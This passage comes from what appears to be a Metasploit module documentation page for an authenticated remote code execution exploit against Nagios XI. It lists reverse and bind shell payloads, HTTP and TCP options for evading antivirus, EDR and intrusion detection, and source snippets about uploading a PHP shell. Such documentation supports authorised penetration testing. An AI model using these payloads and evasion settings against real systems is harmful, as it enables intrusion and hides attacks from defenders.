   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/nagios_xi_snmptrap_authenticated_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to install Nagios XI on the target.


Here is a relevant code snippet related to the "Failed to install Nagios XI on the target." error message:

102:	      login_result, res_array = login_after_install_or_license(username, password, finish_install)
103:	      case login_result
104:	      when 1..3 # An error occurred
105:	        return CheckCode::Unknown(res_array[0])
106:	      when 4 # Nagios XI is still not fully installed
107:	        return CheckCode::Detected('Failed to install Nagios XI on the target.')
108:	      end
109:	    end
110:	
111:	    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
112:	    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.

Failed to sign the license agreement.


Here is a relevant code snippet related to the "Failed to sign the license agreement." error message:

120:	      login_result, res_array = login_after_install_or_license(username, password, finish_install)
121:	      case login_result
122:	      when 1..3
123:	        return CheckCode::Unknown(res_array[0])
124:	      when 5 # the Nagios XI license agreement still has not been signed
125:	        return CheckCode::Detected('Failed to sign the license agreement.')
126:	      end
127:	    end
128:	
129:	    print_good('Successfully authenticated to Nagios XI')
130:	

Unable to obtain the Nagios XI version from the dashboard


Here is a relevant code snippet related to the "Unable to obtain the Nagios XI version from the dashboard" error message:

131:	    # Obtain the Nagios XI version
132:	    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
133:	
134:	    nagios_version = nagios_xi_version(res_array[0])
135:	    if nagios_version.nil?
136:	      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
137:	    end
138:	
139:	    print_status("Target is Nagios XI with version #{nagios_version}")
140:	
141:	    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'

Connection failed while trying to upload the PHP shell


Here is a relevant code snippet related to the "Connection failed while trying to upload the PHP shell" error message:

186:	        'mode' => 'customTrap'
187:	      }
188:	    })
189:	
190:	    unless res
191:	      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the PHP shell')
192:	    end
193:	
194:	    unless res.code == 200 && res.body.include?('var message = "Custom trap sent successfully!";')
195:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to upload the PHP shell')
196:	    end

Unexpected response received while trying to upload the PHP shell


Here is a relevant code snippet related to the "Unexpected response received while trying to upload the PHP shell" error message:

190:	    unless res
191:	      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the PHP shell')
192:	    end
193:	
194:	    unless res.code == 200 && res.body.include?('var message = "Custom trap sent successfully!";')
195:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to upload the PHP shell')
196:	    end
197:	  end
198:	
199:	  def execute_command(cmd, _opts = {})
200:	    send_request_cgi({

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Chris Lyne
  • Erik Wynter

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.